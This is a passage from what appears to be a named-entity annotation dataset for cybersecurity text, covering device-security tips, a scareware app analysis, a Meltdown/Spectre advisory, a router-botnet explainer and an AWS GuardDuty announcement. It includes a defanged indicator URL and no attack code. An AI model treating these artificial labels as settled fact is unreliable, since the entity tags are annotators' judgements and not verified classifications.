rather than admin accounts.","entities":[],"relations":[],"Comments":[]} {"id":2981,"text":"Set everyone up as a “regular user” and set up a separate administrative account to use for maintenance.","entities":[],"relations":[],"Comments":[]} {"id":2982,"text":"If you have kids, avoid the temptation to let them all use one account or accounts without passwords: this is a chance for them to start to learn the right way to handle passwords by giving them their own and teaching them to never share that password.","entities":[],"relations":[],"Comments":[]} {"id":2983,"text":"You can generate the password for them and retain it as the “administrator” if you want for monitoring.","entities":[],"relations":[],"Comments":[]} {"id":2984,"text":"This also is an important lesson for kids to understand that privacy on computers isn’t absolute: the admin can always look at what they’re doing.","entities":[],"relations":[],"Comments":[]} {"id":2985,"text":" 4. Prevent Lost Tablets and Smartphones from Turning into Something Worse: Portable devices means an increased risk of loss or theft.","entities":[],"relations":[],"Comments":[]} {"id":2986,"text":"These days, our portable devices often have greater access to more sensitive information than our PCs and Macs do – in the form of mobile banking apps, wallet apps and stored credit cards.","entities":[],"relations":[],"Comments":[]} {"id":2987,"text":"All modern tablets and smartphones have settings you should enable before you take these portable devices out of your home: a. Passcodes to lock the device.","entities":[],"relations":[],"Comments":[]} {"id":2988,"text":"b. Encryption of information on the device.","entities":[],"relations":[],"Comments":[]} {"id":2989,"text":"c. Lost device location.","entities":[],"relations":[],"Comments":[]} {"id":2990,"text":"d. Deleting or “wiping” data if too many bad passcodes are tried or if you active it remotely.","entities":[],"relations":[],"Comments":[]} {"id":2991,"text":" 5. Protect your Data on Smartwatches and Personal Fitness Devices: Smartwatches and personal fitness devices are similar to smartphones and tablets and have some of the same features.","entities":[],"relations":[],"Comments":[]} {"id":2992,"text":"In addition to using those features, you should take time to ensure you know what health information is being used and that the cloud account(s) these devices synchronize with have very strong passwords.","entities":[],"relations":[],"Comments":[]} {"id":2993,"text":"These devices gather some of your most personal information.","entities":[],"relations":[],"Comments":[]} {"id":2994,"text":"In some cases, the most serious risk isn’t around the device but the data being stored in the cloud.","entities":[],"relations":[],"Comments":[]} {"id":2995,"text":" 6. Be Smart with Your Smart Home: Smart home is an umbrella term for a diverse set of devices that have one thing in common: they all feature some kind of internet connectivity.","entities":[],"relations":[],"Comments":[]} {"id":2996,"text":"Each and every device will have its own security and privacy settings and it pays to take time to understand those BEFORE you put these to work in your home.","entities":[],"relations":[],"Comments":[]} {"id":2997,"text":"Across the board, though, making sure your home router and Wi-Fi have good security and that you’re using good, strong unique passwords when paring devices with apps (where possible) are easy things you can do for all these devices.","entities":[],"relations":[],"Comments":[]} {"id":2998,"text":" 7. Don’t Forget About Home Entertainment Apps, TVs and DVRs:","entities":[],"relations":[],"Comments":[]} {"id":2999,"text":"When we think about home entertainment, there’s really two things you need to think about with security.","entities":[],"relations":[],"Comments":[]} {"id":3000,"text":"First is the security of the devices themselves.","entities":[],"relations":[],"Comments":[]} {"id":3001,"text":"In nearly all cases, good security around home routers and Wi-Fi will be the best thing you can do for the devices.","entities":[],"relations":[],"Comments":[]} {"id":3002,"text":"But home entertainment isn’t just the physical devices.","entities":[],"relations":[],"Comments":[]} {"id":3003,"text":"It’s the apps you use to view content.","entities":[],"relations":[],"Comments":[]} {"id":3004,"text":"All apps like those from Netflix, Amazon, Hulu and others have their own passwords to connect to their service, and attackers crack and sell compromised accounts to these services.","entities":[{"id":48120,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":48119,"label":"SOFTWARE","start_offset":25,"end_offset":32},{"id":48121,"label":"SOFTWARE","start_offset":42,"end_offset":46}],"relations":[],"Comments":[]} {"id":3005,"text":"Because of this, make sure you’re using good, strong unique passwords for the apps you use on these devices.","entities":[],"relations":[],"Comments":[]} {"id":3006,"text":"This will also protect these apps on your tablets, smartphones, PCs and Macs.","entities":[],"relations":[],"Comments":[]} {"id":3007,"text":"While You’re at it, Protect Your Gaming Consoles:","entities":[],"relations":[],"Comments":[]} {"id":3008,"text":"Similar to home entertainment devices, gaming consoles have both the security of the actual device and then the security of the cloud-based accounts to deal with.","entities":[],"relations":[],"Comments":[]} {"id":3009,"text":"Just like with home entertainment devices, it’s the cloud-based account that attackers are more interested in.","entities":[],"relations":[],"Comments":[]} {"id":3010,"text":"Here again, taking time to set up good strong passwords is key.","entities":[],"relations":[],"Comments":[]} {"id":3011,"text":"Also, many gaming platforms now include a second means of authentication (typically a text sent to your phone): you can and should enable that, if at all possible.","entities":[],"relations":[],"Comments":[]} {"id":3012,"text":" 9. Configure User Profiles for Voice Assistants:","entities":[],"relations":[],"Comments":[]} {"id":3013,"text":"Voice assistants are some of the newest devices out there, which means they’re the least known and understood.","entities":[],"relations":[],"Comments":[]} {"id":3014,"text":"The biggest risk that’s been popularly discussed is voice command hijacking by outside sources.","entities":[],"relations":[],"Comments":[]} {"id":3015,"text":"While a cool news story, it’s not been documented to be a broad risk, especially as devices get better at specific voice recognition.","entities":[],"relations":[],"Comments":[]} {"id":3016,"text":"For these devices, take time to configure individual user profiles as much as possible.","entities":[],"relations":[],"Comments":[]} {"id":3017,"text":"And many of these devices feature mute buttons that can functionally turn them off when you don’t need them.","entities":[],"relations":[],"Comments":[]} {"id":3018,"text":"If you haven’t been using it, consider using that feature.","entities":[],"relations":[],"Comments":[]} {"id":3019,"text":" 10. Use Smart Speakers Smartly:","entities":[],"relations":[],"Comments":[]} {"id":3020,"text":"Smart speakers can be thought of as a subset of home assistants in that they are voice-activated devices in your home.","entities":[],"relations":[],"Comments":[]} {"id":3021,"text":"And many smart speakers have digital home assistants built into them, making the distinction even less clear.","entities":[],"relations":[],"Comments":[]} {"id":3022,"text":"This means that what you would do for security for your digital home assistant would apply to smart speakers as well.","entities":[],"relations":[],"Comments":[]} {"id":3023,"text":"However, one thing to consider is if all you really want or need is a smart music device, it may make sense to keep your purchases focused on devices that do only that.","entities":[],"relations":[],"Comments":[]} {"id":3024,"text":"This can improve your security by reducing the risk posed by features that you don’t want or need.","entities":[],"relations":[],"Comments":[]} {"id":3025,"text":"11. Drive Safely and Securely with Smart Cars:","entities":[],"relations":[],"Comments":[]} {"id":3026,"text":"While “car hacking” is something that you see in the news, the reality is that practical smart car security is more common than headlines may lead you to believe.","entities":[],"relations":[],"Comments":[]} {"id":3027,"text":"A key differentiating feature with smart cars is they often have “smart” lock and ignition systems that are tied to fobs and\/or your devices (like a smartphone).","entities":[],"relations":[],"Comments":[]} {"id":3028,"text":"Good smart car security in this case means building on the good security around devices and good physical security.","entities":[],"relations":[],"Comments":[]} {"id":3029,"text":"Ensure that any connected smart devices have good security, especially to protect against loss or theft.","entities":[],"relations":[],"Comments":[]} {"id":3030,"text":"Make sure you only give fobs to people that you trust.","entities":[],"relations":[],"Comments":[]} {"id":3031,"text":"And ensure that any cloud-connected accounts have good passwords and use a second authentication method, if possible.","entities":[],"relations":[],"Comments":[]} {"id":3032,"text":" 12. Patch, Patch and Patch Some More:","entities":[],"relations":[],"Comments":[]} {"id":3033,"text":"We close this list with patching because it is the most important thing you can do.","entities":[],"relations":[],"Comments":[]} {"id":3034,"text":"Few people like getting into the guts of devices to manage updates and the apps on them but the reality right now is that this is not only critical for security and privacy, it’s also sometimes a process that can only be done manually.","entities":[],"relations":[],"Comments":[]} {"id":3035,"text":"For every kind of device or system, you should think about and understand how you can do updates for: a.","entities":[],"relations":[],"Comments":[]} {"id":3036,"text":"The “firmware”: this is the software that is on the physical device itself, like the actual router, the actual car or the actual DVR.","entities":[],"relations":[],"Comments":[]} {"id":3037,"text":"b. The operating system on the device: Some devices don’t have an operating system separate from the firmware, but many do.","entities":[],"relations":[],"Comments":[]} {"id":3038,"text":"PCs and Macs have firmware and an operating system (Windows, macOS and Linux).","entities":[{"id":48122,"label":"SOFTWARE","start_offset":52,"end_offset":59},{"id":48123,"label":"SOFTWARE","start_offset":61,"end_offset":67},{"id":48124,"label":"SOFTWARE","start_offset":71,"end_offset":76}],"relations":[],"Comments":[]} {"id":3039,"text":"c. The apps and applications on the computer or device: Like we noted about home entertainment and gaming consoles, sometimes it’s the apps rather than the device itself that is important.","entities":[],"relations":[],"Comments":[]} {"id":3040,"text":"Many apps these days have auto-update capabilities.","entities":[],"relations":[],"Comments":[]} {"id":3041,"text":"But some don’t, so it’s important to make sure you know how apps get their updates.","entities":[],"relations":[],"Comments":[]} {"id":3042,"text":" If you take some time to understand these basic ideas and take these basic steps, you can ensure that you’ve got a good start on using new devices more safely and with better privacy during the holiday season. Of course, this isn’t an exhaustive list.","entities":[],"relations":[],"Comments":[]} {"id":3043,"text":"And it’s always good to know about other features and capabilities, for example child safety controls.","entities":[],"relations":[],"Comments":[]} {"id":3044,"text":"But the start of a journey of a thousand miles begins with one step, and the start of a journey of a thousand days of using these new devices safely can start with these simple steps.","entities":[],"relations":[],"Comments":[]} {"id":3045,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":3046,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":3047,"text":"We have recently been investigating an antivirus app in the Google Play store that was displaying fake virus detection results to scare users into purchasing a premium service.","entities":[{"id":48125,"label":"SOFTWARE","start_offset":60,"end_offset":71}],"relations":[],"Comments":[]} {"id":3048,"text":"According to the Google Play store statistics, users have downloaded “AntiVirus for Android™” more than one million times and the app was listed in Top 100 free apps in Tools category.","entities":[{"id":45757,"label":"SOFTWARE","start_offset":17,"end_offset":29},{"id":45758,"label":"malware","start_offset":70,"end_offset":92}],"relations":[],"Comments":[]} {"id":3049,"text":"Our Wildfire analysis cloud captured the initial app and identified it as Scareware.","entities":[{"id":48126,"label":"SOFTWARE","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} {"id":3050,"text":" On January 20, we reported this issue to Google and two days later, they removed the app from Google Play.","entities":[{"id":48128,"label":"identity","start_offset":42,"end_offset":48},{"id":48127,"label":"TIME","start_offset":4,"end_offset":14},{"id":48129,"label":"SOFTWARE","start_offset":95,"end_offset":106}],"relations":[],"Comments":[]} {"id":3051,"text":" “AntiVirus for Android™” was developed by a company named “CTG Network Ltd.","entities":[{"id":45759,"label":"malware","start_offset":3,"end_offset":24},{"id":45760,"label":"identity","start_offset":61,"end_offset":77}],"relations":[],"Comments":[]} {"id":3052,"text":"”(Figure 1)","entities":[],"relations":[],"Comments":[]} {"id":3053,"text":"According the (now removed) Google Play listing, the app was downloaded and installed between 1 million and 5 millions times.","entities":[{"id":48130,"label":"SOFTWARE","start_offset":28,"end_offset":39}],"relations":[],"Comments":[]} {"id":3054,"text":"Before the removal it had also received 5,162 recommendations and 16,531 reviews that resulted in an average score of 4.0.","entities":[],"relations":[],"Comments":[]} {"id":3055,"text":"According to AppBrain, the app was also listed in top 30 of Top Grossing Apps in Tools category in United States, Japan, France and South Korea.","entities":[{"id":48132,"label":"location","start_offset":99,"end_offset":112},{"id":48131,"label":"identity","start_offset":13,"end_offset":21},{"id":48133,"label":"location","start_offset":114,"end_offset":119},{"id":48134,"label":"location","start_offset":121,"end_offset":127},{"id":48135,"label":"location","start_offset":132,"end_offset":143}],"relations":[],"Comments":[]} {"id":3056,"text":" Figure 1 AntiVirus for Android™ in the Google Play Store ","entities":[{"id":48136,"label":"malware","start_offset":10,"end_offset":32},{"id":48137,"label":"SOFTWARE","start_offset":40,"end_offset":57}],"relations":[],"Comments":[]} {"id":3057,"text":"When a user opens the app, it will always report that it has located two or three threats on the device (Figure 2), including the following: Figure 2","entities":[],"relations":[],"Comments":[]} {"id":3058,"text":"The App Indicates Two Threats were Found If the user clicks the “Repair” button, the apps will indicate that one of the threats was eliminated and advise the user to upgrade to its full version to remove the remaining threat(s).","entities":[],"relations":[],"Comments":[]} {"id":3059,"text":"If the user clicks the “Update to Full Protection” button they will be prompted to subscribe to a service that costs $4.99 (US) per month through In-App Purchase of Google Play (Figure 3). Figure 3","entities":[],"relations":[],"Comments":[]} {"id":3060,"text":"The app requests that the user pay 4.99$ per month for full protection.","entities":[],"relations":[],"Comments":[]} {"id":3061,"text":"Through analyzing the app’s code we discovered a multiple indications that this program was not a legitimate Antivirus program, but actually Scareware.","entities":[],"relations":[],"Comments":[]} {"id":3062,"text":"First, the initial “threats detection results” are hard-coded in the app (Figure 4), which means the app wasn't actually detecting them on the phone.","entities":[],"relations":[],"Comments":[]} {"id":3063,"text":"The developer even directly named these “infected packages” as “fake.virus” in the source code.","entities":[{"id":48138,"label":"FILEPATH","start_offset":64,"end_offset":74}],"relations":[],"Comments":[]} {"id":3064,"text":" Figure 4 Hard-coded fake threat detection results ","entities":[],"relations":[],"Comments":[]} {"id":3065,"text":"Since the detection result is fake, the subsequent cleaning is not real either – the elimination operation is just marking a flag of \"initial_virus_cleared\" to “1” in the app’s internal database.","entities":[],"relations":[],"Comments":[]} {"id":3066,"text":"The code in Figure 5 shows that the “We have eliminated 1 of %d Threat(s)” message shown in Figure 3 is also hard coded.","entities":[],"relations":[],"Comments":[]} {"id":3067,"text":"Figure 5 Code that generated the fake threat cleared page.","entities":[],"relations":[],"Comments":[]} {"id":3068,"text":" One interesting difference between this program and other Fake AV apps is “AntiVirus for Android™” will actually provide real antivirus services to paid users.","entities":[{"id":48139,"label":"malware","start_offset":76,"end_offset":98}],"relations":[],"Comments":[]} {"id":3069,"text":"The app integrates a mobile antivirus engine provided by Bitdefender and if users upgrade to the premium version, it will scan apps and the device’s SD card with that engine.","entities":[],"relations":[],"Comments":[]} {"id":3070,"text":"This is the main reason we classify the program as Scareware rather than just Fake AV.","entities":[],"relations":[],"Comments":[]} {"id":3071,"text":" It is not clear whether the integrated BitDefender AV engine is actually licensed to the app’s developer.","entities":[{"id":48140,"label":"SOFTWARE","start_offset":40,"end_offset":51}],"relations":[],"Comments":[]} {"id":3072,"text":"The engine retrieves code updated and new signatures updating from hxxp:\/\/ api.androidsantivirus .com \/antivirus\/android-arm, which is hosted on the app’s official website.","entities":[{"id":45761,"label":"URL","start_offset":67,"end_offset":124}],"relations":[],"Comments":[]} {"id":3073,"text":" Figure 6 The App Integrates the BitDefender AV Engine for Premium Users ","entities":[{"id":9395,"label":"SOFTWARE","start_offset":33,"end_offset":44}],"relations":[],"Comments":[]} {"id":3074,"text":"In March of 2014, a Fake AV app named “Virus Shield” was listed for sale at $3.99 and quickly rose to the top position of Google Play’s New Paid Apps list.","entities":[{"id":48141,"label":"malware","start_offset":39,"end_offset":51},{"id":48142,"label":"SOFTWARE","start_offset":122,"end_offset":134},{"id":48143,"label":"TIME","start_offset":3,"end_offset":16}],"relations":[],"Comments":[]} {"id":3075,"text":"Virus Shield was downloaded over 30,000 times, fare fewer than this latest piece of Scareware, although we do not know how many users actually paid for the $4.99 monthly service before Google removed the app from the store.","entities":[{"id":45762,"label":"identity","start_offset":185,"end_offset":191},{"id":45763,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":3076,"text":" The fact that AntiVirus for Android™ contains an actual AV engine makes it more difficult for other programs to identify it as Scareware, as this makes the program appear legitimate.","entities":[{"id":48144,"label":"malware","start_offset":15,"end_offset":37}],"relations":[],"Comments":[]} {"id":3077,"text":"While Google has already removed this application from the Play store, we’ll keep monitoring the latest Android apps to make sure WildFire is providing the best protection for our customers.","entities":[{"id":48145,"label":"identity","start_offset":6,"end_offset":12},{"id":48147,"label":"SOFTWARE","start_offset":104,"end_offset":111},{"id":48148,"label":"SOFTWARE","start_offset":130,"end_offset":138},{"id":48146,"label":"SOFTWARE","start_offset":59,"end_offset":69}],"relations":[],"Comments":[]} {"id":3078,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":3079,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":3080,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3081,"text":"This post is also available in: 日本語 (Japanese) Bottom line","entities":[],"relations":[],"Comments":[]} {"id":3082,"text":"up front","entities":[],"relations":[],"Comments":[]} {"id":3083,"text":" Overview ","entities":[],"relations":[],"Comments":[]} {"id":3084,"text":"In the past 48 hours, there has been a flurry of activity as hardware and software vendors move to address two sets of vulnerabilities that have been dubbed “Meltdown” and “Spectre”.","entities":[{"id":45764,"label":"vulnerability","start_offset":158,"end_offset":166},{"id":45765,"label":"vulnerability","start_offset":173,"end_offset":180},{"id":9420,"label":"TIME","start_offset":3,"end_offset":20}],"relations":[],"Comments":[]} {"id":3085,"text":" This blog is meant to give an overview of the situation, the vulnerabilities, assist Palo Alto Networks customers and others with their risk assessment, and provide recommendations for actions they can take to prevent successful attacks against these vulnerabilities.","entities":[{"id":48149,"label":"identity","start_offset":86,"end_offset":104}],"relations":[],"Comments":[]} {"id":3086,"text":" Situation ","entities":[],"relations":[],"Comments":[]} {"id":3087,"text":"On January 3, 2018, researchers, including those with Google Project Zero, released information on three new vulnerabilities:","entities":[{"id":48150,"label":"TIME","start_offset":3,"end_offset":18},{"id":45766,"label":"identity","start_offset":54,"end_offset":73}],"relations":[],"Comments":[]} {"id":3088,"text":" They grouped these vulnerabilities under the names “Spectre” (CVE-2017-5753 and CVE-2017-5715) and “Meltdown” (CVE-2017-5754).","entities":[{"id":48151,"label":"vulnerability","start_offset":63,"end_offset":76},{"id":48152,"label":"vulnerability","start_offset":81,"end_offset":94},{"id":48153,"label":"vulnerability","start_offset":112,"end_offset":125},{"id":48154,"label":"vulnerability","start_offset":53,"end_offset":60},{"id":48155,"label":"vulnerability","start_offset":101,"end_offset":109}],"relations":[{"id":388,"from_id":48154,"to_id":48151,"type":"related-to"}],"Comments":[]} {"id":3089,"text":" Comprehensive details on both of these are available at https:\/\/meltdownattack.com.","entities":[{"id":9439,"label":"URL","start_offset":57,"end_offset":83}],"relations":[],"Comments":[]} {"id":3090,"text":" Security updates to address these vulnerabilities began to be released prior to disclosure on January 3, 2018.","entities":[{"id":45767,"label":"TIME","start_offset":95,"end_offset":110}],"relations":[],"Comments":[]} {"id":3091,"text":"Security updates are continuing to be released and are expected to be released over time due to the uniquely broad nature of these vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":3092,"text":" At the time of this writing, there are no known active attacks against any of these vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":3093,"text":" Vulnerabilities These vulnerabilities present a unique situation because they ultimately are hardware-based vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":3094,"text":"All three stem from issues in modern processors and are known to affect Intel and ARM chips.","entities":[],"relations":[],"Comments":[]} {"id":3095,"text":"The vulnerability status of AMD chips is unclear at the time of this writing.","entities":[],"relations":[],"Comments":[]} {"id":3096,"text":" Because these affect processors, this means that the operating systems and applications that run on top of these processors are vulnerable.","entities":[],"relations":[],"Comments":[]} {"id":3097,"text":" Because these vulnerabilities affect the processors at the physical layer, the only way for the vulnerabilities to be fully addressed is for the processors to be replaced or to have a firmware update.","entities":[],"relations":[],"Comments":[]} {"id":3098,"text":" Until then, the makers of operating systems can (and have) released patches that make the physical-layer vulnerabilities inaccessible.","entities":[],"relations":[],"Comments":[]} {"id":3099,"text":"For all intents and purposes, it “patches” the vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":3100,"text":" Full technical details on the vulnerabilities are available at the sites referenced above.","entities":[],"relations":[],"Comments":[]} {"id":3101,"text":"But the key point to understand about these vulnerabilities is that they are information disclosure vulnerabilities that can enable processes and applications to access information they otherwise shouldn’t be able to: user-mode applications can access privileged information in the kernel and throughout the operating system.","entities":[],"relations":[],"Comments":[]} {"id":3102,"text":" For regular end-user systems and devices, malware and malicious scripts can use these vulnerabilities to access information like usernames, passwords and account information.","entities":[],"relations":[],"Comments":[]} {"id":3103,"text":" For shared-hosting environments like public cloud providers, this means that one hosted customer could potentially access the information of any other customer hosted on the same hardware.","entities":[],"relations":[],"Comments":[]} {"id":3104,"text":" Based on analysis of the vulnerabilities, an industry consensus is emerging that generic protections against attacks aimed at these vulnerabilities will be difficult, if not impossible to develop.","entities":[],"relations":[],"Comments":[]} {"id":3105,"text":"This means that prevention against attacks will have to focus on specific malware, attacks, and hosting sites as they emerge.","entities":[],"relations":[],"Comments":[]} {"id":3106,"text":" Risk Assessment","entities":[],"relations":[],"Comments":[]} {"id":3107,"text":" Because these are information disclosure vulnerabilities, they don’t pose the same, immediate danger like WannaCry\/WanaCrypt0r or Petya\/NotPetya.","entities":[{"id":9496,"label":"malware","start_offset":137,"end_offset":145},{"id":9493,"label":"malware","start_offset":107,"end_offset":115},{"id":9494,"label":"malware","start_offset":116,"end_offset":127},{"id":9495,"label":"malware","start_offset":131,"end_offset":136}],"relations":[],"Comments":[]} {"id":3108,"text":"This has more in common with the Heartbleed event of 2014.","entities":[{"id":48254,"label":"vulnerability","start_offset":33,"end_offset":43},{"id":48255,"label":"TIME","start_offset":53,"end_offset":57}],"relations":[],"Comments":[]} {"id":3109,"text":" In terms of the severity of the vulnerabilities themselves: they are important, but not critical.","entities":[],"relations":[],"Comments":[]} {"id":3110,"text":"They are information disclosure, not code execution, vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":3111,"text":" The greatest area of risk is in shared-hosting scenarios.","entities":[],"relations":[],"Comments":[]} {"id":3112,"text":"Fortunately, most cloud providers have already deployed security updates and those that haven’t are expected to do so shortly.","entities":[],"relations":[],"Comments":[]} {"id":3113,"text":" For end-users and those managing networks, the greatest risk these vulnerabilities pose is exploitation by malware seeking to gather information like usernames and passwords from systems. What makes these vulnerabilities most notable from a risk assessment point of view is breadth of exposure.","entities":[],"relations":[],"Comments":[]} {"id":3114,"text":"Since these potentially affect nearly every device with a modern processor, that means that full mitigation and remediation may not be possible.","entities":[],"relations":[],"Comments":[]} {"id":3115,"text":"Older systems (like Windows XP) and devices (like older Android smartphones and IoT devices) will likely never receive fixes for these vulnerabilities.","entities":[{"id":48257,"label":"SOFTWARE","start_offset":56,"end_offset":63},{"id":48256,"label":"SOFTWARE","start_offset":20,"end_offset":30}],"relations":[],"Comments":[]} {"id":3116,"text":"Calls to Action ","entities":[],"relations":[],"Comments":[]} {"id":3117,"text":"The actions to take in response to this event are clear and simple: As always, we will continue to watch this event closely and provide any updates that we can.","entities":[],"relations":[],"Comments":[]} {"id":3118,"text":" For information on how Palo Alto Networks products are affected by these issues, customers can see our posting on the Live Community at: https:\/\/live.paloaltonetworks.com\/t5\/Customer-Advisories\/Information-about-Meltdown-and-Spectre-findings\/ta-p\/193878\/jump-to\/first-unread-message.","entities":[{"id":48258,"label":"identity","start_offset":24,"end_offset":42},{"id":9530,"label":"URL","start_offset":138,"end_offset":283}],"relations":[],"Comments":[]} {"id":3119,"text":" If you have any questions, please visit the Threat & Vulnerability Discussions on our Live Community.","entities":[],"relations":[],"Comments":[]} {"id":3120,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":3121,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3122,"text":"In recent research, Palo Alto Networks found attackers were targeting home routers to take control and use them for attacks against other websites that can bring them down.","entities":[{"id":48259,"label":"identity","start_offset":20,"end_offset":38}],"relations":[],"Comments":[]} {"id":3123,"text":"Here we explain this type of attack and what you should do.","entities":[],"relations":[],"Comments":[]} {"id":3124,"text":" Why should I care, what can it do to me?","entities":[],"relations":[],"Comments":[]} {"id":3125,"text":"These attacks could affect you in two ways: What causes this kind of attack?","entities":[],"relations":[],"Comments":[]} {"id":3126,"text":"Weak passwords and out-of-date software can both enable attackers to take complete control of your home router.","entities":[{"id":48260,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":48261,"label":"attack-pattern","start_offset":19,"end_offset":39}],"relations":[],"Comments":[]} {"id":3127,"text":" How can I prevent it?","entities":[],"relations":[],"Comments":[]} {"id":3128,"text":"Attackers target home routers like this by targeting default passwords and out-of-date software on the routers.","entities":[{"id":48262,"label":"attack-pattern","start_offset":53,"end_offset":70},{"id":48263,"label":"attack-pattern","start_offset":75,"end_offset":95}],"relations":[],"Comments":[]} {"id":3129,"text":"An easy thing you can do is restart your router once a week (typically by unplugging it).","entities":[],"relations":[],"Comments":[]} {"id":3130,"text":"You can also stay safe by changing the password on your router and updating the software.","entities":[],"relations":[],"Comments":[]} {"id":3131,"text":"If you’re not sure how to do this, contact your Internet Service Provider (ISP) that gave you the router for help.","entities":[],"relations":[],"Comments":[]} {"id":3132,"text":" How does it work?","entities":[],"relations":[],"Comments":[]} {"id":3133,"text":"When devices (in this case, the routers) are under someone else’s control like this, the collection is referred to as a “botnet”, a network (-net) of remotely controlled systems or devices (bot-).","entities":[],"relations":[],"Comments":[]} {"id":3134,"text":"When attackers have complete control of your home router, they can install attack software that they control, turning the device into a “bot”.","entities":[],"relations":[],"Comments":[]} {"id":3135,"text":"Attacks can make all the controlled routers in a botnet do anything they want, including sending huge amounts of data to try and bring websites down.","entities":[],"relations":[],"Comments":[]} {"id":3136,"text":"These kinds of attacks are called “Distributed Denial of Service” or “DDoS” attacks.","entities":[{"id":48264,"label":"attack-pattern","start_offset":35,"end_offset":64},{"id":48265,"label":"attack-pattern","start_offset":70,"end_offset":74}],"relations":[],"Comments":[]} {"id":3137,"text":"Attackers use them to take down websites for several reasons: About Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.","entities":[],"relations":[],"Comments":[]} {"id":3138,"text":"They’re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life.","entities":[{"id":48266,"label":"identity","start_offset":24,"end_offset":71}],"relations":[],"Comments":[]} {"id":3139,"text":"Got a topic you want us to write about for you, your friends, or your family?","entities":[],"relations":[],"Comments":[]} {"id":3140,"text":"Email us at u42comms@paloaltonetworks.com.","entities":[{"id":9584,"label":"EMAIL","start_offset":12,"end_offset":41}],"relations":[],"Comments":[]} {"id":3141,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":3142,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3143,"text":"There’s a very good reason why AWS remains a leader in cloud computing.","entities":[],"relations":[],"Comments":[]} {"id":3144,"text":"While many providers describe themselves as “customer obsessed,” few come close to our long-time partner in the lengths it goes to earn and retain the trust of its customers.","entities":[],"relations":[],"Comments":[]} {"id":3145,"text":"AWS starts with the customer and works backwards.","entities":[{"id":48267,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":3146,"text":"That means the vast majority of its feature enhancements and new services are directly driven from their input.","entities":[],"relations":[],"Comments":[]} {"id":3147,"text":"The latest is Amazon GuardDuty Malware Protection.","entities":[{"id":48268,"label":"SOFTWARE","start_offset":14,"end_offset":49}],"relations":[],"Comments":[]} {"id":3148,"text":"This threat detection tool, which will work closely with Trend Micro cloud solutions, will provide another valuable layer of defense in our fight against a shared adversary.","entities":[{"id":48269,"label":"SOFTWARE","start_offset":57,"end_offset":84}],"relations":[],"Comments":[]} {"id":3149,"text":"Shining a light on an expanding attack surface Spurred by a drive for greater cost efficiency and business agility, global organizations are migrating to the cloud in droves.","entities":[],"relations":[],"Comments":[]} {"id":3150,"text":"Gartner predicts the worldwide market for public cloud services will reach almost $495bn this year, and grow by over 21% in 2023.","entities":[{"id":48271,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":3151,"text":"In this environment, security remains a persistent concern for cloud builders, because if not properly managed, investments can increase the digital attack surface.","entities":[],"relations":[],"Comments":[]} {"id":3152,"text":"According to recent Trend Micro research, many global organizations are already struggling to securely manage their cloud assets.","entities":[{"id":48270,"label":"identity","start_offset":20,"end_offset":31}],"relations":[],"Comments":[]} {"id":3153,"text":"We found that 73% of IT and business leaders are concerned with the size of their attack surface, and 43% claim it is “spiralling out of control.”","entities":[],"relations":[],"Comments":[]} {"id":3154,"text":"Cloud is the area where most respondents say they have least insight.","entities":[],"relations":[],"Comments":[]} {"id":3155,"text":"They want their cloud providers to do more—for example by building enhanced detection into their systems, to complement third-party tools.","entities":[],"relations":[],"Comments":[]} {"id":3156,"text":"That’s part of the reason why AWS built Amazon GuardDuty Malware Protection was built.","entities":[{"id":48273,"label":"SOFTWARE","start_offset":40,"end_offset":75},{"id":48272,"label":"identity","start_offset":30,"end_offset":33}],"relations":[],"Comments":[]} {"id":3157,"text":"This new feature is triggered by detection of known malicious signatures across the cloud network.","entities":[],"relations":[],"Comments":[]} {"id":3158,"text":"Based on this detection, the service scans the associated Amazon EBS storage environment for malware and reports any findings to AWS Security Hub.","entities":[{"id":48274,"label":"SOFTWARE","start_offset":58,"end_offset":88},{"id":48275,"label":"SOFTWARE","start_offset":129,"end_offset":145}],"relations":[],"Comments":[]} {"id":3159,"text":"Open APIs from here link to products like Trend Micro Cloud One to enhance existing detection and response efforts.","entities":[{"id":48276,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":48277,"label":"SOFTWARE","start_offset":42,"end_offset":63}],"relations":[],"Comments":[]} {"id":3160,"text":"Better together Trend Micro and AWS have been working closely together for over a decade now, and this latest announcement represents another exciting stage in the journey.","entities":[{"id":48278,"label":"identity","start_offset":16,"end_offset":27},{"id":48279,"label":"identity","start_offset":32,"end_offset":35}],"relations":[],"Comments":[]} {"id":3161,"text":"Customers will welcome AWS native threat detection as a complement to their Trend Micro Cloud One capabilities, delivering a comprehensive range of features to secure the hybrid cloud.","entities":[{"id":48280,"label":"identity","start_offset":23,"end_offset":26},{"id":48281,"label":"SOFTWARE","start_offset":76,"end_offset":97}],"relations":[],"Comments":[]} {"id":3162,"text":"Once they add the AWS tool to our virtual patching, vulnerability 